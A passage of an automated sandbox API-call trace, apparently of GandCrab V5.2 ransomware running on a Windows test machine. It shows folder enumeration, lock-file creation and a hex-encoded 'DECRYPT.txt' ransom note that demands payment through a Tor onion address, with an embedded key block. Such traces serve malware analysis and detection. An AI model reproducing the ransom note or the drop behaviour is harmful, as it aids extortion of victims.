Data" [0086.341] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\" [0086.341] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0086.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.341] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.341] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.341] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.341] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.341] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.342] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.342] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.342] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\\\TITWMVJL-DECRYPT.txt") returned 60 [0086.342] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\application data\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0086.342] GetLastError () returned 0x50 [0086.342] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.342] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.343] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1f, wMilliseconds=0x28b)) [0086.343] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.343] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0086.343] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0086.343] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\d2ca4a09d2ca4deb61a.lock") returned 63 [0086.343] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\application data\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0086.344] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.344] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.344] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\") returned 39 [0086.344] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\*" [0086.344] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0086.345] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0086.345] CloseHandle (hObject=0x230) returned 1 [0086.345] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0086.345] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0086.345] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0086.345] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Contacts" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts" [0086.345] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\" [0086.345] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0086.345] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.345] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0086.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.346] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0086.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.346] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0086.346] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0086.346] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0086.346] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.346] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.347] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\\\TITWMVJL-DECRYPT.txt") returned 52 [0086.347] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0086.347] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x